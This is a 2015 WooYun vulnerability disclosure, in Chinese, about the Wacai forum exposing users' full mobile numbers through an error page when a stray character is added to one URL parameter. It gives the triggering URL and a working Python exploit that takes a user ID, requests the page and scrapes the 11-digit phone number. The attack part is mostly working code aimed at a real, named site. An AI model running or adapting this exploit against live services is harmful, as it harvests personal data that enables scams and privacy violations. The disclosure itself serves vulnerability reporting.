当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121540

漏洞标题:挖财论坛某页面过滤不完整可任意读取部分用户手机号附Exp

相关厂商:杭州财米科技有限公司

漏洞作者: SheepGuest

提交时间:2015-06-19 08:30

修复时间:2015-06-24 08:32

公开时间:2015-06-24 08:32

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-19: 细节已通知厂商并且等待厂商处理中
2015-06-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

漏洞说小也小,说大也大,只要不被黑产牛利用一切都是好的,不然满屏诈骗信息...

详细说明:

废话不多说,直接上图

1.png


问题出在这个URL上面

http://bbs.wacai.com/home.php?mod=spacecp'&ac=poke&op=send&uid=3864222&handlekey=propokehk_3864222&infloat=yes&handlekey=a_poke_3864222&inajax=1&ajaxtarget=fwin_content_a_poke_3864222


mod=spacecp 后面随便加个符号 比如我这里加的单引号,会以内部错误的原因将页面返还,并且手机号也完整的显示出来了...

2.png

漏洞证明:

Exp:

# -*- coding: utf-8 -*-
__author__ = 'SheepGuest'
import re
import urllib
import urllib2
#from sys import argv
class Wacai:
def __init__(self,uid):
self.url_headers = {
'User_Agent':'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Proxy-Connection':'keep-alive',
'Cache-Control':'max-age=0',
'Accept':'*/*',
'x-requested-with':'XMLHttpRequest',
'Accept-Language':'zh-cn',
'Referer':'http://bbs.wacai.com/home.php?mod=space&uid=' + str(uid) + '&do=profile.&from=space',
}
self.url = 'http://bbs.wacai.com/home.php'
self.req = re.compile('<title>(\d{11}).*?</title>')
def gethtml(self,uid):
try:
post_values = urllib.urlencode({
'mod':'spacecp.','ac':'poke','op':'send','uid':str(uid),'handlekey':'propokehk_' + str(uid),
'infloat':'yes','handlekey':'a_poke_' + str(uid),'inajax':'1','ajaxtarget':'fwin_content_a_poke_' + str(uid),
})
postdata = self.url + '?' + post_values
request = urllib2.Request(postdata,data=None,headers=self.url_headers)
response = urllib2.urlopen(request)
return response.read().decode('utf-8')
except urllib2.URLError, e:
if hasattr(e,"reason"):
print u"连接挖财网失败,错误原因",e.reason
return None
def getTel(self,response):
try:
result = re.search(self.req,response)
result = result.group(1)
print 'Tel is : %s' % result
except AttributeError, e:
print u"请输入正确的uid"
return None
if __name__ == '__main__':
#script,uid = argv
uid = raw_input('input uid:')
if len(uid) > 7:
print u"uid范围在 1 ~ 7 位"
else:
ptel = Wacai(uid)
response = ptel.gethtml(uid)
ptel.getTel(response)


上图测试下效果

3.png


4.png


5.png


6.png

修复方案:

过滤完整

版权声明:转载请注明来源 SheepGuest@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-24 08:32

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

2015-06-24:感谢您的反馈,漏洞已紧急处理